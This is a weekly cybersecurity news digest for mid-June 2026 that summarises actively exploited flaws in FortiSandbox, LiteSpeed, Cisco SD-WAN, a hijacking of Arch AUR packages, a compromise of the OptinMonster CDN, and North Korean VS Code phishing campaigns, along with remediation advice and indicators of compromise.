06/10/2026-06/17/2026 Three Critical Forti Sandbox Bugs, LiteSpeed cPanel Plugin Flaw, Over 400 Arch Linux AUR Packages Hijacked And More.

1. Fortinet Warned as Three Critical FortiSandbox Bugs Come Under Attack

Three vulnerabilities in Fortinet FortiSandbox, including one patched just last week, are already being actively exploited, according to cybersecurity firm Defused Cyber.
Two flaws—CVE-2026-39813 (CVSS 9.1), a path traversal vulnerability, and CVE-2026-39808 (CVSS 9.8), an OS command injection flaw—allow unauthenticated attackers to achieve code execution through crafted HTTP requests. Both vulnerabilities have had patches available since April.

The third flaw, CVE-2026-25089, affects FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS WEB UI. It is an OS command injection vulnerability that enables unauthenticated attackers to execute unauthorized commands via specially crafted HTTP requests. Despite being patched only last week, it is already being exploited in the wild.

Researchers also noted that the exploit for CVE-2026-25089 appears to have been developed with AI assistance and contains bugs, yet attackers are still targeting unpatched systems. The incidents underscore how rapidly attackers are weaponizing newly disclosed vulnerabilities, leaving organizations with increasingly narrow patching windows.

2. CISA Flags LiteSpeed cPanel Plugin Flaw Exploited for Root Privilege Escalation

CISA has added a LiteSpeed cPanel Plugin vulnerability, CVE-2026-54420 (CVSS 8.5), to its KEV catalog. Federal agencies must apply fixes by June 18, 2026.
The flaw is a privilege-escalation issue affecting shared hosting servers running CloudLinux or CageFS. Attackers with FTP or web shell access can potentially gain root privileges due to improper handling of user-provided symlinks in LiteSpeed cPanel Plugin versions before 2.4.8. Although active exploitation details remain unclear, LiteSpeed recommends checking affected servers using a provided grep command. No output indicates the server is likely unaffected, while output should be reviewed against additional indicators to rule out false positives.

The issue was reported by Namecheap on May 31, 2026. Users should upgrade to LiteSpeed WHM Plugin 5.3.2.1 (including cPanel Plugin 2.4.8) or later to remediate the vulnerability.

3. Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit

Attackers hijacked more than 400 packages in the Arch User Repository (AUR), modifying build scripts to install malware that steals credentials from systems that build or update affected packages. The official Arch Linux repositories were not impacted.

Dubbed Atomic Arch by Sonatype, the campaign targeted abandoned AUR packages that attackers adopted and modified. Malicious code was inserted into PKGBUILD and install scripts, causing systems to download and execute a Rust-based credential stealer through malicious npm packages such as atomic-lockfile. The malware targets browser cookies, developer tokens, SSH keys, cloud credentials, and messaging app sessions. When run with root privileges, it can also deploy an optional eBPF rootkit for stealth and persistence.

Researchers identified more than 400 compromised packages, with additional malicious packages linked to a second payload distributed through js-digest. Users who installed or updated AUR packages after June 11 should review affected package lists, rotate credentials, check for persistence mechanisms, and consider rebuilding compromised systems from trusted media.

4. OptinMonster Plugin Hack Exposes 1.2 Million WordPress Sites to Cyberattack

A major supply chain attack has exposed more than 1.2 million WordPress websites after attackers injected malicious code into JavaScript files distributed through trusted CDN infrastructure. Security researchers at Sansec found that popular Awesome Motive plugins, including OptinMonster, TrustPulse, and PushEngage, were affected.

Instead of targeting websites directly, attackers compromised JavaScript files hosted on Awesome Motive’s CDN. Any site loading these files unknowingly executed the malware. The payload activates only when a WordPress administrator is logged in, helping it evade detection.

Once active, the malware collects site data, steals authentication tokens, and creates unauthorized administrator accounts such as developer_api1 or randomly generated dev_xxxxxx accounts. Stolen data is encrypted and sent to the command-and-control domain tidio.cc.

Attackers also install hidden backdoor plugins, including content-delivery-helper and database-optimizer, enabling remote code execution and long-term access. Organizations should check for these indicators and suspicious administrator accounts immediately.

5. CVE-2026-20262: CISCO Catalyst SD-WAN Flaw Under Active Targeted Exploitation

Cisco has warned that CVE-2026-20262, an actively exploited vulnerability in Cisco Catalyst SD-WAN Manager, could allow authenticated attackers to create or overwrite files on affected systems. The flaw, rated CVSS 6.5, stems from improper validation of user input during file uploads in the web interface.

By sending a crafted HTTP request to a vulnerable API endpoint, an attacker with valid low-privileged credentials and write access can perform arbitrary file writes. These files may then be used to escalate privileges to root, potentially leading to full system compromise. Cisco’s Product Security Incident Response Team (PSIRT) has observed limited exploitation of the flaw since June 2026 and strongly recommends upgrading to a patched software version. While technical details of the attacks have not been disclosed, the targeted nature of the activity suggests involvement by a sophisticated threat actor. CISA has added CVE-2026-20262 to its KEV catalog and ordered federal agencies to apply fixes by June 29, 2026.

6. North Korean Hackers Are Turning Developer Tools Into Malware Delivery Channels

Cybersecurity researchers have identified two malicious campaigns linked to the North Korean threat cluster known as Contagious Interview. Proofpoint reports the activity, dubbed UNK_DeadDrop, uses recruitment-themed phishing emails posing as developer job offers or code reviews to target nearly 100 organizations across finance, crypto, education, and tech.

The infection chain begins with emails linking to attacker-controlled GitHub repositories containing malicious scripts. Victims are instructed to open projects in VS Code, triggering cross-platform malware for Windows, macOS, and Linux, including a modified Overlord framework. A key technique uses VS Code’s “runOn: folderOpen” feature to execute code automatically when a project is opened.

The malware installs loaders that deploy a malicious VSIX extension disguised as a Google service, enabling remote command execution, data theft, and credential harvesting, particularly from crypto wallets. Stolen data is exfiltrated to a command-and-control server. Researchers note the campaign has evolved from social-media-based fake interviews to large-scale email phishing, indicating increasing operational scale and sophistication among North Korean-aligned actors.